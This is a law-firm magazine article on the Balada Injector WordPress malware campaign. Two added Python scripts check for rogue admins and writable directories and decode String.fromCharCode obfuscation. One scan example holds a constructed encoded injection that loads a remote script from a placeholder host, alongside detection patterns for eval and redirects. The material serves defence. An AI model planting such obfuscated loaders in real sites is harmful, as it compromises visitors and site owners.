WordPress Security Breach Used Vulnerabilities in Plugins and Themes

BY Bigger Law Firm Magazine

Security vulnerability infected websites
  • Over 1 million sites have been affected by the Balada Injector since 2017.
  • The malware allows attackers to generate fake WordPress admin users.
  • The report underscores the importance of keeping plugins and themes updated.

Over one million WordPress websites have been infected since 2017 by a malware campaign known as Balada Injector, according to Sucuri, the website security firm owned by GoDaddy. The attackers behind the campaign use all known and recently disclosed vulnerabilities in WordPress themes and plugins to break into sites, and their attacks arrive in waves, roughly once every few weeks. The campaign is recognizable by its use of String.fromCharCode obfuscation, by freshly registered domain names that host malicious scripts on random subdomains, and by redirects to a variety of scam sites.

Once inside, the malware creates rogue WordPress administrator accounts, harvests data stored on the host, and plants backdoors for persistent access. It also searches from the top-level directories of the compromised site's file system for writable directories that belong to other sites on the same server. In this way a single compromised site can hand the attackers access to several other sites at no extra cost.
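The two behaviors just described, rogue administrator accounts and writable directories belonging to other sites, are also the two cheapest things to check for after a suspected compromise. The Python script below is an added example, not code from this article or from Sucuri's report. The user rows and the directory tree it examines are constructed inside the script, and the logins, timestamps and site names in them are placeholders.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# --- Check 1: administrator accounts you did not create ---------------------
# WordPress stores a user's roles in wp_usermeta under the key
# "<table_prefix>capabilities" as a PHP-serialized array such as
#     a:1:{s:13:"administrator";b:1;}
# The rows below are constructed for this example; on a real site they would
# come from a query like
#     SELECT u.user_login, u.user_registered, m.meta_value
#       FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
#      WHERE m.meta_key = 'wp_capabilities';
SAMPLE_USER_ROWS = [
    ("jsmith",       "2019-03-04 10:12:00", 'a:1:{s:13:"administrator";b:1;}'),
    ("paralegal1",   "2021-07-19 09:00:00", 'a:1:{s:6:"editor";b:1;}'),
    ("wp-admin-bak", "2023-04-02 03:41:17", 'a:1:{s:13:"administrator";b:1;}'),
]

# One "role name switched on" entry inside the serialized array.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_capabilities(serialized):
    """Return the set of role names enabled in a serialized capabilities array."""
    return set(ROLE_RE.findall(serialized))


def unexpected_admins(rows, known_admins):
    """(login, registered) for every administrator not on the allowlist.

    The registration timestamp is returned because a rogue account created
    during an attack wave usually stands out by date alone.
    """
    return [
        (login, registered)
        for login, registered, caps in rows
        if "administrator" in roles_from_capabilities(caps) and login not in known_admins
    ]


# --- Check 2: directories that other sites could write into -----------------
def world_writable_dirs(root, own_docroot=None):
    """Directories under root whose mode has the other-write bit set.

    own_docroot, if given, is skipped so the result lists only directories
    belonging to neighbouring sites, which is what a cross-site infection
    launched from one compromised account targets on shared hosting.
    """
    root = Path(root).resolve()
    own = Path(own_docroot).resolve() if own_docroot else None
    hits = []
    for dirpath, _dirnames, _files in os.walk(root):
        p = Path(dirpath)
        if own is not None and (p == own or own in p.parents):
            continue
        if os.stat(p).st_mode & stat.S_IWOTH:
            hits.append(p)
    return sorted(hits)


def build_demo_tree():
    """Constructed shared-hosting layout: two sites, one with a sloppy uploads directory."""
    base = Path(tempfile.mkdtemp(prefix="wpdemo-"))
    for site in ("site-a", "site-b"):
        for sub in ("", "wp-content", "wp-content/uploads"):
            d = base / site / sub
            d.mkdir(exist_ok=True)
            d.chmod(0o755)  # explicit, so the demo does not depend on the umask
    # site-b's uploads directory is world-writable: exactly what the malware hunts for
    (base / "site-b" / "wp-content" / "uploads").chmod(0o777)
    return base


if __name__ == "__main__":
    print("unexpected admins:", unexpected_admins(SAMPLE_USER_ROWS, known_admins={"jsmith"}))
    base = build_demo_tree()
    print("world-writable dirs outside site-a:", world_writable_dirs(base, base / "site-a"))
```

On a real server the second check is the same as running find /var/www -type d -perm -o+w; the Python version is here so the logic can be read and tested against a throwaway tree. Any hit outside your own document root is a directory a neighbouring site's compromised process could drop files into.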

When none of these attack pathways is available, the attackers fall back to brute-forcing the admin password with a set of 74 predefined credentials. WordPress users are therefore advised to keep their website software up to date, remove unused plugins and themes, and use strong, unique WordPress admin passwords.

These findings come on the heels of a similar malicious JavaScript injection campaign that redirects site visitors to adware and scam pages and has affected more than 51,000 websites since 2022. That campaign also uses String.fromCharCode obfuscation, and it leads victims to booby-trapped pages that pose as a CAPTCHA check in order to trick them into enabling browser push notifications, which are then used to serve deceptive content.
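Both campaigns above rely on String.fromCharCode to hide what an injected script actually does, so a useful check when reviewing a site is to decode those calls and look at the result. The Python script below is an added example, not code from this article or from either campaign; the page snippets it scans are constructed here, and the hostnames in them (k7.example.invalid, lawfirm.example) are placeholders, not domains used by the attackers.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Matches String.fromCharCode(60, 115, ...) with a purely numeric argument list,
# the form used by injected loaders. Calls assembled at run time, e.g. via
# String["fromCharCode"] or with computed arguments, need a real JS parser.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9,\s]+?)\s*\)")
# Function the decoded string is fed straight into (looked up just before the call).
WRAPPER = re.compile(r"(eval|document\.write|setTimeout|Function)\s*\(\s*$")
HOST = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+)")
REDIRECT = re.compile(r"\blocation\b\s*(?:\.(?:href|replace|assign)|=)")


def decode_fromcharcode(text, max_rounds=5):
    """Replace each numeric String.fromCharCode(...) call with the string it builds.

    Repeats until nothing changes, because injected loaders sometimes nest one
    encoded layer inside another. Code units are taken mod 65536, as JavaScript does.
    Returns (decoded_text, rounds_applied).
    """
    rounds = 0
    while rounds < max_rounds:
        new = FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n) & 0xFFFF) for n in m.group(1).split(",") if n.strip()),
            text,
        )
        if new == text:
            break
        text, rounds = new, rounds + 1
    return text, rounds


@dataclass
class Finding:
    decoded: str
    wrapper: Optional[str]
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.indicators)


def scan(html, own_hosts=()):
    """Decode every fromCharCode call in a page and flag those that build script
    tags, redirects, code execution, or references to hosts outside own_hosts.
    fromCharCode by itself is not an indicator: plenty of legitimate code uses it."""
    findings = []
    for m in FROMCHARCODE.finditer(html):
        decoded, _ = decode_fromcharcode(m.group(0))
        wrap = WRAPPER.search(html[max(0, m.start() - 40):m.start()])
        f = Finding(decoded=decoded, wrapper=wrap.group(1) if wrap else None)
        if "<script" in decoded.lower():
            f.indicators.append("script-tag")
        if REDIRECT.search(decoded):
            f.indicators.append("redirect")
        if re.search(r"\beval\s*\(|document\.write\s*\(", decoded):
            f.indicators.append("eval-or-write")
        for host in HOST.findall(decoded):
            if not any(host == h or host.endswith("." + h) for h in own_hosts):
                f.indicators.append("external-host:" + host)
        findings.append(f)
    return findings


# Constructed samples, not captured from a real site. Decoded, the injected one
# reads <script src="//k7.example.invalid/s.js"></script>.
SAMPLE_INJECTED = (
    "<html><body><p>Welcome to the firm</p>\n"
    "<script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,47,47,"
    "107,55,46,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,115,46,106,115,34,62,"
    "60,47,115,99,114,105,112,116,62))</script>\n"
    "</body></html>"
)
SAMPLE_BENIGN = "var tab = String.fromCharCode(9); var hi = String.fromCharCode(72,105);"
# Two layers deep: the outer call decodes to String.fromCharCode(65), which decodes to A.
SAMPLE_NESTED = "eval(String.fromCharCode(83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,54,53,41))"

if __name__ == "__main__":
    for label, page in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        for f in scan(page, own_hosts=("lawfirm.example",)):
            print(f"[{label}] suspicious={f.suspicious} wrapper={f.wrapper} "
                  f"indicators={f.indicators} decoded={f.decoded!r}")
    print("nested:", decode_fromcharcode(SAMPLE_NESTED))
```

Run it over the HTML of a page as served to a visitor (not only the theme files on disk, since the injection may come from a database option or a plugin file that is only included at render time), and treat any finding that names a host you do not own as something to investigate rather than as proof on its own.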

The lesson here is clear: law firms must keep their WordPress plugins and themes up to date and make sure their website is protected against these types of attacks. That means using strong passwords, removing unused plugins and themes, and regularly backing up site data.

Bigger Law Firm Magazine

Bigger Law Firm Magazine has been helping law firms grow since 2011. We regularly publish helpful insights from industry professionals to help legal marketing directors, firm administrators, and lawyers build bigger and more efficient law firms.
